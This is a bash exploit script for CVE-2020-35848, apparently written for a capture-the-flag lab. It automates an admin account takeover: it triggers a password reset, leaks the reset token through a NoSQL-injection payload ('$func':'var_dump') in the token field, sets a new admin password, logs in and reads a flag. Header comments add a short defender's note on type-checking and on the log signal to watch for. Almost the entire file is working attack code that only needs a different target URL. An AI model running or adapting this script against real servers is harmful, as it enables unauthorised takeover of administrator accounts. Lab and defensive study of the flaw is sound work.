#!/bin/bash
# automated_exploit.sh - CVE-2020-35848 Comprehensive Exploitation
#
# Phase 1 of a CTF lab walk-through against the local target in LAB_URL.
# Flow: request a password reset for ADMIN_USER, recover the reset token
# through the injectable token parameter, set a new password, log in, and
# read the web flag. The remaining flags need manual access (final message).
#
# Defender's view: the one step that must fail on a patched target is the
# token recovery in extract_token — a reset token should be known only to
# the mailbox owner. A server that insists "token" is a plain string before
# using it in a lookup is not affected, and a JSON object where a string is
# expected is the signal to look for in request logs.

LAB_URL="http://ctf-lab.local"
ADMIN_USER="admin"
NEW_PASS="newpassword123"

# Header shared by every JSON request below.
JSON_HEADER="Content-Type: application/json"

#######################################
# Ask the target to start a password reset for ADMIN_USER.
# Globals:   LAB_URL, ADMIN_USER, JSON_HEADER (read)
# Outputs:   raw curl response on stdout
#######################################
request_reset() {
  curl -s -X POST "$LAB_URL/auth/requestreset" \
    -H "$JSON_HEADER" \
    -d '{"user":"'"$ADMIN_USER"'"}'
}

#######################################
# Recover the freshly issued reset token.
# The token field is sent as an operator object instead of a string; an
# unpatched target evaluates it and the stored token shows up in the
# response body. Nothing is printed when the target rejects the object.
# Globals:   LAB_URL, JSON_HEADER (read)
# Outputs:   first "rp-<hex>" match on stdout, or nothing
#######################################
extract_token() {
  local body
  body=$(curl -s -X POST "$LAB_URL/auth/newpassword" \
    -H "$JSON_HEADER" \
    -d '{"token":{"$func":"var_dump"}}')
  grep -oE 'rp-[a-f0-9]{40,}' <<<"$body" | head -n1
}

#######################################
# Set ADMIN_USER's password to NEW_PASS using the recovered token.
# Globals:   LAB_URL, NEW_PASS, JSON_HEADER (read)
# Arguments: $1 - reset token
# Outputs:   raw curl response on stdout
#######################################
reset_password() {
  local token=$1
  curl -s -X POST "$LAB_URL/auth/resetpassword" \
    -H "$JSON_HEADER" \
    -d '{"token":"'"$token"'","password":"'"$NEW_PASS"'"}'
}

#######################################
# Log in with the new password; the session cookie is written to
# cookies.txt in the current directory (removed at the end of main).
# Globals:   LAB_URL, ADMIN_USER, NEW_PASS, JSON_HEADER (read)
#######################################
login() {
  curl -s -X POST "$LAB_URL/auth/login" \
    -H "$JSON_HEADER" \
    -d '{"user":"'"$ADMIN_USER"'","password":"'"$NEW_PASS"'"}' \
    -c cookies.txt > /dev/null
}

#######################################
# Fetch the web flag with the saved session cookie.
# Globals:   LAB_URL (read)
# Outputs:   response body on stdout
#######################################
fetch_web_flag() {
  curl -s "$LAB_URL/collections/flag.txt" -b cookies.txt
}

main() {
  local token web_flag

  echo "[*] Phase 1: Exploiting CVE-2020-35848..."

  # Trigger password reset
  request_reset
  sleep 2

  # Extract reset token via NoSQL injection
  token=$(extract_token)
  if [[ -z "$token" ]]; then
    echo "[!] Failed to extract reset token. Exiting."
    exit 1
  fi
  echo "[+] Extracted reset token: $token"

  # Reset admin password
  reset_password "$token"
  sleep 2

  # Login and retrieve web application flag; flags in this lab start with CTF
  login
  web_flag=$(fetch_web_flag)
  if [[ $web_flag == CTF* ]]; then
    echo "[+] WEB APPLICATION FLAG: $web_flag"
  else
    echo "[!] Web flag not accessible. Check authentication."
  fi

  echo "[*] Phase 1 Complete. Manual system access required for remaining flags."
  # Drop the session cookie so it does not linger in the working directory.
  rm -f cookies.txt
}

main "$@"